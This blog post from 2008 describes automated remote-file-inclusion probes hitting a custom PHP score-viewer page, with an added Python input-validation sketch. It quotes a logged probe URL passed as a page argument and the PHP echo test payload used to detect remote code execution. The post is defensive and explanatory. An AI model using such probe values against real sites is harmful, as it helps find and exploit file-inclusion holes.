Friday, January 18, 2008

Attackers automating tests for argument modification / injection

I have on one of my web sites a dynamic page that displays an image supplied as an argument within a web page.

For example, this will display a page of a musical score in a web page:

viewscore.php?name=scores2002/americathebeautiful_3pm_p1.gif

Yes, it's written in PHP, but the language doesn't matter...

I thought that I was relatively safe from attacks because this is a custom page, not one that is from an open source project that might develop a known weakness.

The page is carefully written to:

* Accept only the one "name" argument.
* Validate it against a regular expression.
* Check that the score really exists on disk.
* Perform some other checks.

I have it email me when one of these conditions fails. In particular, if the score page doesn't exist, it could mean that I forgot to post it or put it in the wrong place.
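The checks listed above, sketched as an added example; this is not the site's actual code, and it is written in Python since the language doesn't matter here. The regular expression, the reason strings other than "Bad Name", and the names `check_request` and `demo` are assumptions, and the sample requests are constructed.

```python
import re
import tempfile
from pathlib import Path

# Assumed naming scheme, inferred from the sample URL on the page:
# scoresYYYY/<lowercase letters, digits, underscores>.gif
NAME_RE = re.compile(r"scores\d{4}/[a-z0-9_]+\.gif")


def check_request(params, root):
    """Return (path, None) if the request is acceptable, else (None, reason)."""
    # 1. Only the one "name" argument; a repeated argument that a query
    #    parser turned into a list is rejected as well.
    if set(params) != {"name"} or not isinstance(params["name"], str):
        return None, "Bad Arguments"
    name = params["name"]
    # 2. Allow-list regex; fullmatch() avoids the trailing-newline gap of "$".
    if not NAME_RE.fullmatch(name):
        return None, "Bad Name"
    # 3. The score must be a regular file that resolves inside the root
    #    (the containment check catches symlinks pointing elsewhere).
    root = Path(root).resolve()
    path = (root / name).resolve()
    if root not in path.parents:
        return None, "Outside Root"
    if not path.is_file():
        return None, "Missing Score"
    return path, None


def demo():
    """Run constructed requests against a throwaway score directory."""
    with tempfile.TemporaryDirectory() as tmp:
        (Path(tmp) / "scores2002").mkdir()
        score = Path(tmp) / "scores2002" / "americathebeautiful_3pm_p1.gif"
        score.write_bytes(b"GIF89a")
        requests = [  # constructed sample requests
            {"name": "scores2002/americathebeautiful_3pm_p1.gif"},
            {"name": "http://example.invalid/probe/"},
            {"name": "scores2002/../../etc/passwd"},
            {"name": "scores2002/notposted_p1.gif"},
            {"name": "scores2002/americathebeautiful_3pm_p1.gif", "debug": "1"},
            {"name": "scores2002/americathebeautiful_3pm_p1.gif\n"},
        ]
        return [check_request(r, tmp)[1] for r in requests]


if __name__ == "__main__":
    print(demo())
```

Each rejection reason is what would go into the notification email, so a remote-URL probe and a score that was never posted stay distinguishable.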

Lately I've been getting a lot of emails like this:
========
Bad Name
Score name: "http://sans-packing.ru/img/jipeqap/ehudute/"
Visitor IP: 169.244.70.147
========

When you visit the URL, the page there shows this PHP (and it's not getting executed):

<?php echo md5("just_a_test");?>

The domains seem legitimate; they'll be unwilling hosts for spammers' images at some point.

If the attack had succeeded, my site would have become the destination of spam emails, ruining my site's reputation.

The moral of the story: Even if you're a little niche custom page, you have to assume that you'll be subject to automated probes for weaknesses.

Check your arguments and check them again!

Update: OK, I think I get it. They want to see if my site will execute the code from the remote site, and that's why the remote site code with "just a test" is plain-text PHP. If my site executes it, it will display a code that they can check for.
